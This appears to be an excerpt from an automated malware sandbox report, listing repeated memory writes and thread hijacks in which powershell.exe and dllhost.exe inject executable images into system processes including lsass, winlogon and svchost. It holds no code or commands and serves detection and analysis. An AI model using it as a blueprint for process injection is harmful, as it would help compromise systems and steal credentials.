Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 192913B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 139F96A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C3D1EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1028 base: 3310000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1028 base: 9850000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3160Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5068Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: C68B738010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CD30000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 11BA702010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5E060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
